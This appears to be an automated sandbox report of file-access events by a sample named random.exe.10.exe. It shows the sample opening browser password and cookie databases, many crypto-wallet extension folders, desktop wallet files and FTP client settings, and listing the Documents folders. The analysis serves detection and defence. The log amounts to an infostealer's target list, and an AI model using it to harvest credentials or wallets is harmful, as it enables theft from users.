                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
